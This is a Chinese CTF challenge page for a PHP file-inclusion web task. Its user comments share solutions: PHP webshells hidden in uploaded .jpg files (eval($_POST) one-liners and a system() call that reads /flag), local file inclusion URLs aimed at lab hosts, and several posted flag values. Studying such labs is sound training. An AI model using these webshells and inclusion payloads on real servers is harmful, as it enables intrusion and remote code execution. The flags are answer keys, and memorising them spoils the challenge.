文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3683
提  示: 文件包含
描  述:
文件包含2
评论
shingu 1月前

file=/flag,怎么会这么简单?

回复 0

volnu1l 3月前

新建txt,保存jpg <script language=php>system("ls /flag&&cat /flag")</script> 访问?file=upload/.jpg

回复 0

yanqiye 4月前

用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。

回复 1

G3tcH4r 5月前

花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思

回复 1

迷茫的三千面 6月前

flag{414a91ba57a5e0b5a4eb725b75f5030e}

回复 0

hao7 6月前

flag{69fc76f3ef98a524a3ef56977fc02278}

回复 0

CHLing 10月前

http://114.67.175.224:18550/index.php?file=//flag

回复 1

qiusheng 1年前

1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX

回复 0

xiaoxiao972521 1年前

虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php

回复 4
冯飞99 1年前

绕来绕去看到你的评论一把过

回复 2

zzccbb2005 1年前

http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}

回复 1

WriteUp

image
harry

4 金币

评分(5)

解题动态

DK. 攻破了该题 21小时前
不知所云111 攻破了该题 2天前
纯情内向小学生 攻破了该题 2天前
冥王大人 攻破了该题 2天前
夜梦 攻破了该题 2天前
candyshop11 攻破了该题 2天前
tmk0 攻破了该题 3天前
zyyyy 攻破了该题 3天前
yanchi 攻破了该题 3天前
wwlwwl 攻破了该题 3天前
huhuhuhuhu 攻破了该题 3天前
18235067052 攻破了该题 3天前
Iuh1A4 攻破了该题 3天前
bugb 攻破了该题 3天前
202504 攻破了该题 3天前
yhawojdb 攻破了该题 3天前
16603451509 攻破了该题 3天前
17735872508 攻破了该题 3天前
13134695428 攻破了该题 3天前
18834030470 攻破了该题 3天前
问题反馈